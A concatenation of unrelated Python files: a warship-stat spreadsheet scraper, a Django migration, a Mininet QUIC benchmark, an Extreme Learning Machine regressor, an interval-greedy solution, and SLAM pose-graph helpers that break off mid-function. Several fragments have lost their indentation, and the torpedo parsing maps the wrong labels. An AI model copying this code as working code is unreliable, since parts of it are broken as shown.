shipSec2GunAPShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum AP Shell Damage':
shipSec2GunAPDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial AP Shell Velocity':
shipSec2GunAPVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shipSec2GunAPWeight = stat.find('span',class_='t-performance_right').text
elif groupName == 'Secondary Armament #3':
shipSec3Gun = ''
shipSec3GunCount = ''
shipSec3GunROF = ''
shipSec3GunReload = ''
shipSec3GunRotate = ''
shipSec3Gun180 = ''
shipSec3GunRange = ''
shipSec3GunDispersion = ''
shipSec3GunHEShell = ''
shipSec3GunHEDam = ''
shipSec3GunHEFire = ''
shipSec3GunHEVel = ''
shipSec3GunHEWeight = ''
shipSec3GunAPShell = ''
shipSec3GunAPDam = ''
shipSec3GunAPVel = ''
shipSec3GunAPWeight = ''
shipSec3Gun = stats[0].find('span',class_='t-performance_left').text
shipSec3GunCount = stats[0].find('span',class_='t-performance_right').text
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Rate of Fire':
shipSec3GunROF = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Reload Time':
shipSec3GunReload = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Rotation Speed':
shipSec3GunRotate = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == '180 Degree Turn Time':
shipSec3Gun180 = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Firing Range':
shipSec3GunRange = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum Dispersion':
shipSec3GunDispersion = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell':
shipSec3GunHEShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum HE Shell Damage':
shipSec3GunHEDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Chance of Fire on Target Caused by HE Shell':
shipSec3GunHEFire = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial HE Shell Velocity':
shipSec3GunHEVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell Weight':
shipSec3GunHEWeight = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell':
shipSec3GunAPShell = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum AP Shell Damage':
shipSec3GunAPDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial AP Shell Velocity':
shipSec3GunAPVel = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shipSec3GunAPWeight = stat.find('span',class_='t-performance_right').text
### Torpedo Tubes
elif groupName == 'Torpedo Tubes':
shipTorpTube = ''
shipTorpCount = ''
shipTorpReload = ''
shipTorpRorate = ''
shipTorp180 = ''
shipTorp = ''
shipTorpDam = ''
shipTorpSpeed = ''
shipTorpRange = ''
shipTorpTube = stats[0].find('span',class_='t-performance_left').text
shipTorpCount = stats[0].find('span',class_='t-performance_right').text
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Initial HE Shell Velocity':
shipTorpReload = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'HE Shell Weight':
shipTorpRorate = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell':
shipTorp180 = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum AP Shell Damage':
shipTorp = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Initial AP Shell Velocity':
shipTorpDam = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shipTorpSpeed = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'AP Shell Weight':
shipTorpRange = stat.find('span',class_='t-performance_right').text
elif groupName == 'AA Defense':
####FUCKING AA GUNS
#### for each ship's count of AA guns, add them to an array. When it's time to print, take the highest number of AA guns and make that the number of AA guns in the sheet
ship0AA = ''
ship0AACount = ''
ship0AADps = ''
ship0AArange = ''
ship1AA = ''
ship1AACount = ''
ship1AADps = ''
ship1AArange = ''
ship2AA = ''
ship2AACount = ''
ship2AADps = ''
ship2AArange = ''
ship3AA = ''
ship3AACount = ''
ship3AADps = ''
ship3AArange = ''
ship4AA = ''
ship4AACount = ''
ship4AADps = ''
ship4AArange = ''
class AAgun:
    """One anti-aircraft mount scraped from a ship's stat table.

    All fields are kept as the raw strings read from the page; numeric
    conversion only happens inside calculatedps().
    """

    # Class-level defaults mirroring the instance attributes set in __init__.
    gun = ""
    guncount = ""
    gunrange = ""
    gundps = ""

    def __init__(self, gunname, count, grange, dps):
        self.gun = gunname          # mount name, e.g. "25 mm/60 Type96"
        self.guncount = count       # "<turrets>x<barrels>" string
        self.gunrange = grange      # firing range as scraped
        self.gundps = dps           # per-barrel DPS as scraped

    def calculatedps(self):
        """Total DPS of the mount: turrets * barrels-per-turret * per-barrel DPS."""
        pieces = self.guncount.split('x')
        return float(pieces[0]) * float(pieces[1]) * float(self.gundps)

    def print(self):
        """Dump the mount's raw fields to stdout (debug helper)."""
        for value in ("this is my fun gun", self.gun, self.guncount,
                      self.gunrange, self.gundps):
            print(value)
shipAAguns = []
statcount = range(0,len(stats),1)
thegun = ""
thecount = ""
therange = ""
thedps = ""
for i in statcount:
# print(i)
if i%3 == 0:
# print(str(i)+"%3=0")
# print("turn this into the gun name and count")
thegun = stats[0].find('span',class_='t-performance_left').text
thecount = stats[0].find('span',class_='t-performance_right').text.replace("pcs.","").replace(' ','')
if i%3 ==1:
# print(str(i)+"%3=1")
# print("this is going to be the dps")
thedps = stats[1].find('span',class_='t-performance_right').text
if i%3 == 2:
# print(str(i)+"%3=2")
# print("this is going to be the range")
therange = stats[2].find('span',class_='t-performance_right').text
newgun = AAgun(thegun,thecount,thedps,therange)
shipAAguns.append(newgun)
thegun = ""
thecount = ""
thedps = ""
therange = ""
# for gun in shipAAguns:
# gun.print()
# for stat in stats:
# print(stat)
# # if line doesn't start with '...'
##TODO - multiple AA Defense
### Maneuverability
elif groupName == 'Maneuverability':
shipSpeed = ''
shipTurnRadius = ''
shipRudderShift = ''
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Maximum Speed':
shipSpeed = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Turning Circle Radius':
shipTurnRadius = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Rudder Shift Time':
shipRudderShift = stat.find('span',class_='t-performance_right').text
### Concealment
elif groupName == 'Concealment':
shipSurfaceDetect = ''
shipAirDetect = ''
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Surface Detectability Range':
shipSurfaceDetect = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Air Detectability Range':
shipAirDetect = stat.find('span',class_='t-performance_right').text
shipBattleLevels = ""
for shipBattleLevel in thisShipSoup.find('span',class_='b-battles-levels_interval'):
if shipBattleLevels == "":
shipBattleLevels = shipBattleLevel.text
else:
shipBattleLevels = shipBattleLevels + "," + shipBattleLevel.text
print("levels:"+shipBattleLevels)
for level in shipBattleLevels.split(','):
# print('battle level '+level)
thesheet = shipsheet['BattleLevel '+level]
thisrow = thesheet.max_row+1
# print('next free row is '+str(thisrow))
for shipvalue in shiparray:
# print('shipvalue we are writing is '+shipvalue)
for i in range(1,thesheet.max_column+1):
if thesheet.cell(row=1,column=i).value == shipvalue:
# print('the column for this value is '+str(i))
# print('saving ')
thesheet.cell(row=thisrow,column=i).value = shiparray[shipvalue]
# input("Press a key to continue...")
shipsheet.save(shipfilename) |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards(apps, schema_editor):
    """Backfill ``payment_plan`` to ``'daily'`` on every existing LawFirm row.

    Args:
        apps: historical app registry supplied by RunPython; models must be
            fetched through it, never imported directly.
        schema_editor: unused, part of the RunPython contract.
    """
    LawFirm = apps.get_model('law_firm', 'LawFirm')
    # Bulk UPDATE in a single query instead of a save() round-trip per row.
    # Historical models carry no custom save() logic or signals, so this is
    # behaviorally equivalent in a data migration and far faster.
    LawFirm.objects.update(payment_plan='daily')
def backwards(apps, schema_editor):
    """Reverse operation: intentionally a no-op.

    The forward pass only backfills a value; leaving it in place when the
    migration is unapplied is harmless, so nothing is undone here.
    """
    pass
class Migration(migrations.Migration):
    """Data migration: set payment_plan='daily' on all existing LawFirm rows."""

    dependencies = [
        ('law_firm', '0018_auto_20180628_0533'),
    ]
    operations = [
        # Reversible wrapper: 'backwards' is a deliberate no-op, so
        # unapplying this migration leaves the backfilled values in place.
        migrations.RunPython(forwards,backwards),
    ]
|
from mpExperience import MpExperience
from mpParamXp import MpParamXp
import os
class MpExperienceQUICReqres(MpExperience):
    """Mininet experiment driving a QUIC request/response benchmark.

    A Go QUIC example server is started in the background on the server
    node, then a Go client benchmarker runs against it for ``run_time``
    seconds (optionally with multipath).  Connectivity is probed with pings
    first, and netstat snapshots are written before/after the run.
    The whole lifecycle is driven from __init__ via classicRun().
    """

    # Paths and log-file names used on the emulated hosts.
    GO_BIN = "/usr/local/go/bin/go"
    SERVER_LOG = "quic_server.log"
    CLIENT_LOG = "quic_client.log"
    #CLIENT_GO_FILE = "~/go/src/github.com/lucas-clemente/quic-go/example/reqres/client/reqres.go"
    #SERVER_GO_FILE = "~/go/src/github.com/lucas-clemente/quic-go/example/reqres/reqres.go"
    PING_OUTPUT = "ping.log"

    def __init__(self, xpParamFile, mpTopo, mpConfig):
        # Base init wires up xpParam/mpTopo/mpConfig; classicRun() then
        # calls prepare()/run()/clean() in sequence.
        MpExperience.__init__(self, xpParamFile, mpTopo, mpConfig)
        self.loadParam()
        self.ping()
        MpExperience.classicRun(self)

    def ping(self):
        # Ping the server once per client interface.  Results are appended
        # (">>") to PING_OUTPUT, so remove any stale file first.
        self.mpTopo.commandTo(self.mpConfig.client, "rm " + \
                MpExperienceQUICReqres.PING_OUTPUT )
        count = self.xpParam.getParam(MpParamXp.PINGCOUNT)
        for i in range(0, self.mpConfig.getClientInterfaceCount()):
            cmd = self.pingCommand(self.mpConfig.getClientIP(i),
                self.mpConfig.getServerIP(), n = count)
            self.mpTopo.commandTo(self.mpConfig.client, cmd)

    def pingCommand(self, fromIP, toIP, n=5):
        """Build a ping command bound to source address *fromIP*.

        Output is appended so successive interfaces share one log file.
        Returns the full shell command string (also echoed for tracing).
        """
        s = "ping -c " + str(n) + " -I " + fromIP + " " + toIP + \
                " >> " + MpExperienceQUICReqres.PING_OUTPUT
        print(s)
        return s

    def loadParam(self):
        """
        Load experiment knobs from the parameter file.

        todo : param LD_PRELOAD ??
        """
        self.run_time = self.xpParam.getParam(MpParamXp.QUICREQRESRUNTIME)
        self.multipath = self.xpParam.getParam(MpParamXp.QUICMULTIPATH)
        self.project = self.xpParam.getParam(MpParamXp.PROJECT)
        self.multifile = self.xpParam.getParam(MpParamXp.MULTIFILE)
        # Go sources of the client benchmarker and the example server for
        # the selected project (e.g. a quic-go fork).
        self.client_go_file = "~/go/src/github.com/lucas-clemente/"+self.project+"/example/client_benchmarker/main.go"
        self.server_go_file = "~/go/src/github.com/lucas-clemente/"+self.project+"/example/main.go"

    def prepare(self):
        # Remove stale logs on both hosts before the run.
        MpExperience.prepare(self)
        self.mpTopo.commandTo(self.mpConfig.client, "rm " + \
                MpExperienceQUICReqres.CLIENT_LOG )
        self.mpTopo.commandTo(self.mpConfig.server, "rm " + \
                MpExperienceQUICReqres.SERVER_LOG )

    def getQUICReqresServerCmd(self):
        # Server listens on all interfaces, port 8080, and is backgrounded
        # ("&") with stdout+stderr redirected to SERVER_LOG.
        s = MpExperienceQUICReqres.GO_BIN + " run " + self.server_go_file
        s += " -addr 0.0.0.0:8080 &>" + MpExperienceQUICReqres.SERVER_LOG + " &"
        print(s)
        return s

    def getQUICReqresClientCmd(self):
        # Client benchmarker targets the server for run_time seconds;
        # "-m" enables multipath when the parameter is > 0.
        s = MpExperienceQUICReqres.GO_BIN + " run " + self.client_go_file
        s += " -addr " + self.mpConfig.getServerIP() + ":8080 -runTime " + self.run_time + "s"
        if int(self.multipath) > 0:
            s += " -m"
        s += " &>" + MpExperienceQUICReqres.CLIENT_LOG
        print(s)
        return s

    def clean(self):
        MpExperience.clean(self)

    def run(self):
        # Sequence matters: snapshot netstat, start server (background),
        # give it 2 s to come up, run the client to completion, snapshot
        # netstat again, then kill the server.
        cmd = self.getQUICReqresServerCmd()
        self.mpTopo.commandTo(self.mpConfig.server, "netstat -sn > netstat_server_before")
        self.mpTopo.commandTo(self.mpConfig.server, cmd)
        self.mpTopo.commandTo(self.mpConfig.client, "sleep 2")
        cmd = self.getQUICReqresClientCmd()
        self.mpTopo.commandTo(self.mpConfig.client, "netstat -sn > netstat_client_before")
        self.mpTopo.commandTo(self.mpConfig.client, cmd)
        self.mpTopo.commandTo(self.mpConfig.server, "netstat -sn > netstat_server_after")
        self.mpTopo.commandTo(self.mpConfig.client, "netstat -sn > netstat_client_after")
        self.mpTopo.commandTo(self.mpConfig.server, "pkill -f " + self.server_go_file)
        self.mpTopo.commandTo(self.mpConfig.client, "sleep 2")
        # Need to delete the go-build directory in tmp; could lead to no more space left error
        self.mpTopo.commandTo(self.mpConfig.client, "rm -r /tmp/go-build*")
|
# -*- coding: utf-8 -*-
"""
This file contains ELMKernel classes and all developed methods.
"""
# Python2 support
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from .mltools import *
import numpy as np
import optunity
import ast
import sys
if sys.version_info < (3, 0):
import ConfigParser as configparser
else:
import configparser
try:
from scipy.special import expit
except ImportError:
_SCIPY = 0
else:
_SCIPY = 1
# Find configuration file
from pkg_resources import Requirement, resource_filename
_ELMR_CONFIG = resource_filename(Requirement.parse("elm"), "elm/elmr.cfg")
class ELMRandom(MLTools):
"""
A Python implementation of ELM Random Neurons defined by Huang[1].
An ELM is a single-hidden layer feedforward network (SLFN) proposed by
Huang back in 2006, in 2012 the author revised and introduced a new
concept of using kernel functions to his previous work.
This implementation currently accepts both methods proposed at 2012,
random neurons and kernel functions to estimate classifier/regression
functions.
Let the dimensionality "d" of the problem be the sum of "t" size (number of
targets per pattern) and "f" size (number of features per pattern).
So, d = t + f
The data will be set as Pattern = (Target | Features).
If database has *N* patterns, its size follows *Nxd*.
Note:
[1] Paper reference: Huang, 2012, "Extreme Learning Machine for
Regression and Multiclass Classification"
Attributes:
input_weight (numpy.ndarray): a random matrix (*Lxd-1*) needed
to calculate H(**x**).
output_weight (numpy.ndarray): a column vector (*Nx1*) calculated
after training, represent :math:\\beta.
bias_of_hidden_neurons (numpy.ndarray): a random column vector
(*Lx1*) needed to calculate H(**x**).
param_function (str): function that will be used for training.
param_c (float): regularization coefficient (*C*) used for training.
param_l (list of float): number of neurons that will be used for
training.
param_opt (bool): a boolean used to calculate an optimization
when number of training patterns are much larger than neurons
(N >> L).
Other Parameters:
regressor_name (str): The name of classifier/regressor.
available_functions (list of str): List with all available
functions.
default_param_function (str): Default function if not set at
class constructor.
default_param_c (float): Default parameter c value if not set at
class constructor.
default_param_l (integer): Default number of neurons if not set at
class constructor.
default_param_opt (bool): Default boolean optimization flag.
Note:
* **regressor_name**: defaults to "elmr".
* **default_param_function**: defaults to "sigmoid".
* **default_param_c**: defaults to 2 ** -6.
* **default_param_l**: defaults to 500.
* **default_param_opt**: defaults to False.
"""
def __init__(self, params=[]):
"""
Class constructor.
Arguments:
params (list): first argument (*str*) is an available function,
second argument (*float*) is the coefficient *C* of
regularization, the third is the number of hidden neurons
and the last argument is an optimization boolean.
Example:
>>> import elm
>>> params = ["sigmoid", 1, 500, False]
>>> elmr = elm.ELMRandom(params)
"""
super(self.__class__, self).__init__()
self.available_functions = ["sigmoid", "multiquadric"]
self.regressor_name = "elmr"
self.default_param_function = "sigmoid"
self.default_param_c = 2 ** -6
self.default_param_l = 500
self.default_param_opt = False
self.input_weight = []
self.output_weight = []
self.bias_of_hidden_neurons = []
# Initialized parameters values
if not params:
self.param_function = self.default_param_function
self.param_c = self.default_param_c
self.param_l = self.default_param_l
self.param_opt = self.default_param_opt
else:
self.param_function = params[0]
self.param_c = params[1]
self.param_l = params[2]
self.param_opt = params[3]
# ########################
# Private Methods
# ########################
def __set_random_weights(self, number_of_hidden_nodes,
number_of_attributes):
"""
Initialize random values to calculate function
Arguments:
number_hidden_nodes (int): number of neurons.
number_of_attributes (int): number of features.
"""
self.input_weight = np.random.rand(number_of_hidden_nodes,
number_of_attributes) * 2 - 1
self.bias_of_hidden_neurons = np.random.rand(number_of_hidden_nodes, 1)
def __map_hidden_layer(self, function_type, number_hidden_nodes, data):
"""
Map argument "data" to the hidden layer feature space.
Arguments:
function_type (str): function to map input data to feature
space.
number_hidden_nodes (int): number of hidden neurons.
data (numpy.ndarray): data to be mapped to feature space.
Returns:
numpy.ndarray: mapped data.
"""
number_of_data = data.shape[0]
if function_type == "sigmoid" or function_type == "sig" or \
function_type == "sin" or function_type == "sine" or \
function_type == "hardlim" or \
function_type == "tribas":
temp = np.dot(self.input_weight, data.conj().T)
bias_matrix = np.tile(self.bias_of_hidden_neurons,
number_of_data)
temp = temp + bias_matrix
elif function_type == "mtquadric" or function_type == "multiquadric":
temph1 = np.tile(np.sum(data ** 2, axis=1).reshape(-1, 1),
number_hidden_nodes)
temph2 = \
np.tile(np.sum(self.input_weight ** 2, axis=1).reshape(-1, 1),
number_of_data)
temp = temph1 + temph2.conj().T \
- 2 * np.dot(data, self.input_weight.conj().T)
temp = temp.conj().T + \
np.tile(self.bias_of_hidden_neurons ** 2, number_of_data)
elif function_type == "gaussian" or function_type == "rbf":
temph1 = np.tile(np.sum(data ** 2, axis=1).reshape(-1, 1),
number_hidden_nodes)
temph2 = \
np.tile(np.sum(self.input_weight ** 2, axis=1).reshape(-1, 1),
number_of_data)
temp = temph1 + temph2.conj().T \
- 2 * np.dot(data, self.input_weight.conj().T)
temp = \
np.multiply(temp.conj().T, np.tile(self.bias_of_hidden_neurons,
number_of_data))
else:
print("Error: Invalid function type")
return
if function_type == "sigmoid" or function_type == "sig":
if _SCIPY:
h_matrix = expit(temp)
else:
h_matrix = 1 / (1 + np.exp(-temp))
elif function_type == "sine" or function_type == "sin":
h_matrix = np.sin(temp)
elif function_type == "mtquadric" or function_type == "multiquadric":
h_matrix = np.sqrt(temp)
elif function_type == "gaussian" or function_type == "rbf":
h_matrix = np.exp(temp)
else:
print("Error: Invalid function type")
return
return h_matrix
def _local_train(self, training_patterns, training_expected_targets,
params):
# If params not provided, uses initialized parameters values
if not params:
pass
else:
self.param_function = params[0]
self.param_c = params[1]
self.param_l = params[2]
self.param_opt = params[3]
number_of_attributes = training_patterns.shape[1]
self.__set_random_weights(self.param_l, number_of_attributes)
h_train = self.__map_hidden_layer(self.param_function, self.param_l,
training_patterns)
# If N >>> L, param_opt should be True
if self.param_opt:
self.output_weight = np.linalg.solve(
(np.eye(h_train.shape[0]) / self.param_c) +
np.dot(h_train, h_train.conj().T),
np.dot(h_train, training_expected_targets))
else:
self.output_weight = np.dot(h_train, np.linalg.solve(
((np.eye(h_train.shape[1]) / self.param_c) + np.dot(
h_train.conj().T, h_train)),
training_expected_targets))
training_predicted_targets = np.dot(h_train.conj().T,
self.output_weight)
return training_predicted_targets
def _local_test(self, testing_patterns, testing_expected_targets,
predicting):
h_test = self.__map_hidden_layer(self.param_function, self.param_l,
testing_patterns)
testing_predicted_targets = np.dot(h_test.conj().T, self.output_weight)
return testing_predicted_targets
# ########################
# Public Methods
# ########################
def search_param(self, database, dataprocess=None, path_filename=("", ""),
save=False, cv="ts", of="rmse", f=None, eval=50):
"""
Search best hyperparameters for classifier/regressor based on
optunity algorithms.
Arguments:
database (numpy.ndarray): a matrix containing all patterns
that will be used for training/testing at some
cross-validation method.
dataprocess (DataProcess): an object that will pre-process
database before training. Defaults to None.
path_filename (tuple): *TODO*.
save (bool): *TODO*.
cv (str): Cross-validation method. Defaults to "ts".
of (str): Objective function to be minimized at
optunity.minimize. Defaults to "rmse".
f (list of str): a list of functions to be used by the
search. Defaults to None, this set all available
functions.
eval (int): Number of steps (evaluations) to optunity algorithm.
Each set of hyperparameters will perform a cross-validation
method chosen by param cv.
Available *cv* methods:
- "ts" :func:`mltools.time_series_cross_validation()`
Perform a time-series cross-validation suggested by Hydman.
- "kfold" :func:`mltools.kfold_cross_validation()`
Perform a k-fold cross-validation.
Available *of* function:
- "accuracy", "rmse", "mape", "me".
See Also:
http://optunity.readthedocs.org/en/latest/user/index.html
"""
if f is None:
search_functions = self.available_functions
elif type(f) is list:
search_functions = f
else:
raise Exception("Invalid format for argument 'f'.")
print(self.regressor_name)
print("##### Start search #####")
config = configparser.ConfigParser()
if sys.version_info < (3, 0):
config.readfp(open(_ELMR_CONFIG))
else:
config.read_file(open(_ELMR_CONFIG))
best_function_error = 99999.9
temp_error = best_function_error
best_param_function = ""
best_param_c = 0
best_param_l = 0
for function in search_functions:
if sys.version_info < (3, 0):
elmr_c_range = ast.literal_eval(config.get("DEFAULT",
"elmr_c_range"))
neurons = config.getint("DEFAULT", "elmr_neurons")
else:
function_config = config["DEFAULT"]
elmr_c_range = ast.literal_eval(function_config["elmr_c_range"])
neurons = ast.literal_eval(function_config["elmr_neurons"])
param_ranges = [[elmr_c_range[0][0], elmr_c_range[0][1]]]
def wrapper_opt(param_c):
"""
Wrapper for optunity.
"""
if cv == "ts":
cv_tr_error, cv_te_error = \
time_series_cross_validation(self, database,
params=[function,
2 ** param_c,
neurons,
False],
number_folds=10,
dataprocess=dataprocess)
elif cv == "kfold":
cv_tr_error, cv_te_error = \
kfold_cross_validation(self, database,
params=[function,
2 ** param_c,
neurons,
False],
number_folds=10,
dataprocess=dataprocess)
else:
raise Exception("Invalid type of cross-validation.")
if of == "accuracy":
util = 1 / cv_te_error.get_accuracy()
else:
util = cv_te_error.get(of)
# print("c:", param_c, "util: ", util)
return util
optimal_pars, details, _ = \
optunity.minimize(wrapper_opt,
solver_name="cma-es",
num_evals=eval,
param_c=param_ranges[0])
# Save best function result
if details[0] < temp_error:
temp_error = details[0]
if of == "accuracy":
best_function_error = 1 / temp_error
else:
best_function_error = temp_error
best_param_function = function
best_param_c = optimal_pars["param_c"]
best_param_l = neurons
if of == "accuracy":
print("Function: ", function,
" best cv value: ", 1/details[0])
else:
print("Function: ", function,
" best cv value: ", details[0])
# MLTools Attribute
self.cv_best_rmse = best_function_error
# elmr Attribute
self.param_function = best_param_function
self.param_c = best_param_c
self.param_l = best_param_l
print("##### Search complete #####")
self.print_parameters()
return None
def print_parameters(self):
    """
    Print the regressor's current parameters and last CV error to stdout.
    """
    # Pre-render every line; %s matches print()'s str() conversion, and the
    # double space reproduces print("label: ", value) separator behavior.
    report = (
        "",
        "Regressor Parameters",
        "",
        "Regularization coefficient:  %s" % self.param_c,
        "Function:  %s" % self.param_function,
        "Hidden Neurons:  %s" % self.param_l,
        "",
        "CV error:  %s" % self.cv_best_rmse,
        "",
        "",
    )
    for line in report:
        print(line)
def get_available_functions(self):
    """
    Return the collection of activation-function names this model supports.
    """
    functions = self.available_functions
    return functions
def train(self, training_matrix, params=[]):
    """
    Compute the output weights needed to test/predict data.

    Delegates to the inherited ``_ml_train``. When *params* is provided it
    is used for this training run; otherwise the defaults chosen at object
    initialization apply.

    Arguments:
        training_matrix (numpy.ndarray): matrix whose rows are the training
            patterns, with target variables in the first column.
        params (list): optional parameter list as defined at
            :func:`ELMKernel.__init__`.

    Returns:
        :class:`Error`: training error object containing expected and
        predicted targets plus all error metrics.
    """
    error = self._ml_train(training_matrix, params)
    return error
def test(self, testing_matrix, predicting=False):
    """
    Compute predictions for *testing_matrix* using the trained model.

    Args:
        testing_matrix (numpy.ndarray): matrix whose rows are the test
            patterns, with target variables in the first column.
        predicting (bool): internal flag used by :func:`predict`; don't set.

    Returns:
        :class:`Error`: testing error object containing expected and
        predicted targets plus all error metrics.
    """
    result = self._ml_test(testing_matrix, predicting)
    return result
# Docstring is copied from MLTools._ml_predict by the decorator, so no
# docstring is defined here (it would be overwritten / redundant).
@copy_doc_of(MLTools._ml_predict)
def predict(self, horizon=1):
    # Thin wrapper: forecast `horizon` steps ahead with the trained model.
    return self._ml_predict(horizon)
# Docstring is copied from MLTools._ml_train_iterative by the decorator.
@copy_doc_of(MLTools._ml_train_iterative)
def train_iterative(self, database_matrix, params=[], sliding_window=168,
                    k=1):
    # Thin wrapper around the sliding-window iterative training routine.
    return self._ml_train_iterative(database_matrix, params,
                                    sliding_window, k)
|
# Greedy sweep over M sorted intervals: counts the minimum number of points
# ("ans") needed so that every interval contains at least one chosen point.
N, M = map(int, input().split())  # N is part of the input format but unused
Q = [[int(s) for s in input().split()] for _ in range(M)]
Q = sorted(Q)
ans = 1
LQ = len(Q)
stan = Q[0][1]  # current candidate point: smallest right endpoint seen so far
while LQ != 0:
    # (removed: an unused `k = 1` assignment left over from development)
    if Q[0][0] < stan:
        # Interval starts before the candidate point, so it can share it;
        # tighten the point to the smaller right endpoint.
        stan = min(stan, Q.pop(0)[1])
        LQ -= 1
    else:
        # Interval starts at/after the point: a new point is required.
        # NOTE(review): if an interval has left == right, Q[0][0] < stan stays
        # False forever and this loop never pops it -- confirm the inputs
        # exclude degenerate intervals.
        ans += 1
        stan = Q[0][1]
print(ans)
|
import os
import csv
import copy
import time
import math
import numpy as np
import matplotlib.pyplot as plt
import minisam
def getConstDigitsNumber(val, num_digits):
    """Format `val` with exactly `num_digits` digits after the decimal point."""
    return f"{val:.{num_digits}f}"
def getUnixTime():
    """Return the current Unix epoch time truncated to whole seconds."""
    now = time.time()
    return int(now)
def eulerAnglesToRotationMatrix(theta):
    """Build a 3x3 rotation matrix from XYZ Euler angles (radians).

    Composes roll (x), then pitch (y), then yaw (z): R = Rz . Ry . Rx.
    """
    cx, sx = math.cos(theta[0]), math.sin(theta[0])
    cy, sy = math.cos(theta[1]), math.sin(theta[1])
    cz, sz = math.cos(theta[2]), math.sin(theta[2])
    rot_x = np.array([[1.0, 0.0, 0.0],
                      [0.0, cx, -sx],
                      [0.0, sx, cx]])
    rot_y = np.array([[cy, 0.0, sy],
                      [0.0, 1.0, 0.0],
                      [-sy, 0.0, cy]])
    rot_z = np.array([[cz, -sz, 0.0],
                      [sz, cz, 0.0],
                      [0.0, 0.0, 1.0]])
    return rot_z.dot(rot_y.dot(rot_x))
def yawdeg2so3(yaw_deg):
    """Return the 3x3 rotation matrix for a pure yaw given in degrees."""
    return eulerAnglesToRotationMatrix([0.0, 0.0, np.deg2rad(yaw_deg)])
def yawdeg2se3(yaw_deg):
    """Return a 4x4 homogeneous transform with a pure yaw and zero translation."""
    transform = np.identity(4)
    transform[:3, :3] = yawdeg2so3(yaw_deg)
    return transform
def getGraphNodePose(graph, idx):
    """Look up node x<idx> in a minisam factor graph.

    Returns a (translation, 3x3 rotation matrix) pair.
    """
    node = graph.at(minisam.key('x', idx))
    return node.translation(), node.so3().matrix()
def saveOptimizedGraphPose(curr_node_idx, graph_optimized, filename):
    """Write the first `curr_node_idx` optimized graph poses to a CSV file.

    Each row is a row-major flattened 4x4 homogeneous transform: three
    rotation/translation rows followed by the constant bottom row 0,0,0,1.
    """
    rows = []
    for opt_idx in range(curr_node_idx):
        pose_trans, pose_rot = getGraphNodePose(graph_optimized, opt_idx)
        pose_trans = np.reshape(pose_trans, (-1, 3)).squeeze()
        pose_rot = np.reshape(pose_rot, (-1, 9)).squeeze()
        # bugfix: the bottom-right element of a homogeneous transform is 1.0
        # (it was written as 0.1).
        rows.append(np.array([pose_rot[0], pose_rot[1], pose_rot[2], pose_trans[0],
                              pose_rot[3], pose_rot[4], pose_rot[5], pose_trans[1],
                              pose_rot[6], pose_rot[7], pose_rot[8], pose_trans[2],
                              0.0, 0.0, 0.0, 1.0]))
    if not rows:
        # Nothing to save (the original raised NameError for curr_node_idx == 0).
        return
    # vstack keeps the output 2-D even for a single pose, so the CSV always
    # has one pose per line (a single 1-D row used to be written one value
    # per line by np.savetxt).
    np.savetxt(filename, np.vstack(rows), delimiter=",")
class PoseGraphResultSaver:
    """Accumulates SLAM poses (row-major flattened 4x4 transforms, 16 values
    per row) and periodically writes them to CSV files under `save_dir`."""
    def __init__(self, init_pose, save_gap, num_frames, seq_idx, save_dir):
        # Rows of pose_list are flattened 4x4 homogeneous transforms.
        self.pose_list = np.reshape(init_pose, (-1, 16))
        self.save_gap = save_gap          # flush to disk every `save_gap` frames
        self.num_frames = num_frames
        self.seq_idx = seq_idx
        self.save_dir = save_dir
        self.rel_pose_list = None         # lazily initialized on first relative pose
    def saveRelativePose(self, rel_pose):
        """Append one relative pose (anything reshapeable to 16 values)."""
        if self.rel_pose_list is not None:
            self.rel_pose_list = np.vstack((self.rel_pose_list, np.reshape(rel_pose, (-1, 16))))
        else:
            self.rel_pose_list = np.reshape(rel_pose, (-1, 16))
    def saveUnoptimizedPoseGraphResult(self, cur_pose, cur_node_idx):
        """Append the current odometry-only pose; flush to CSV periodically."""
        # save
        self.pose_list = np.vstack((self.pose_list, np.reshape(cur_pose, (-1, 16))))
        # write
        if (cur_node_idx % self.save_gap == 0 or cur_node_idx == self.num_frames):
            # save odometry-only poses
